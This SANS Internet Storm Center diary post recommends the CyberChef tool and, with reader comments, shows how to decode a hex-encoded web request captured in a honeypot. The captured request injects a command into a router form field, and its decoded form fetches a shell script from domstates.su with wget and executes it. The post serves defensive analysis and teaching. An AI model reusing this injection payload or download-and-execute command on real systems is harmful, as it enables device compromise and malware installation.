Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: CyberChef a Must Have Tool in your Tool bag! - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CyberChef a Must Have Tool in your Tool bag!

This multipurpose and feature rich tool has been available for a while now and is updated regularly. What I find the most interesting is the number of features that are available this tool.

CyberChef is fully portable and can be downloaded locally as an simple HTML self-contained page that can run in any browsers or if you prefer, you can download the package from Github and compile it yourself[2] but why bother. Since the code is updated regularly, I find the first option more practical. It contains a large number of Operations such as Encoding/Decoding, Logical Operations, Extractors and Hashing to name a few. Note, each one of these Operations expand into a large subset of tools. Here is the complete list of Operations:

For example, take this Web Hex encode data stream that I captured today in my Honeypot:

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

First, take copy the data from '%63%64[...]%73%68' and do a search and replace to remove the percent (%) from the data because CyberChef doesn't have an option to deal with the percent to ignore it. Paste the result into the Iput box and select From Hex to see the human readable text:

6364202F746D703B726D202D66206E6D6C74312E73683B77676574202D4F206E6D6C74312E736820687474703A2F2F646F6D7374617465732E73752F6E6D6C74312E73683B63686D6F64202B78206E6D6C74312E73683B2E2F6E6D6C74312E7368

The human readable form translate to:

cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh http://domstates.su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh

If you have been looking for a multipurpose tool, this is the one. Give it a try!

[1] https://gchq.github.io/CyberChef/
[2] https://github.com/gchq/CyberChef
[3] https://encoder.secapps.com/

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Guy

409 Posts
ISC Handler
Cyberchef can handled the removal of the '%' characters for you, and it highlights the beauty of getting to string together operations. There's an operation called "Find/Replace". Add that first, with the options Find on regex with only the % character in there, leave the replace field blank, and make sure global match is checked. Then drag in the "to hex" option.
Anonymous

Posts
Or better yet, use the URL Decode function, no find/replace necessary! Thanks for the article, Guy! This is a very useful tool!
Anonymous

Posts

Sign Up for Free or Log In to start participating in the conversation!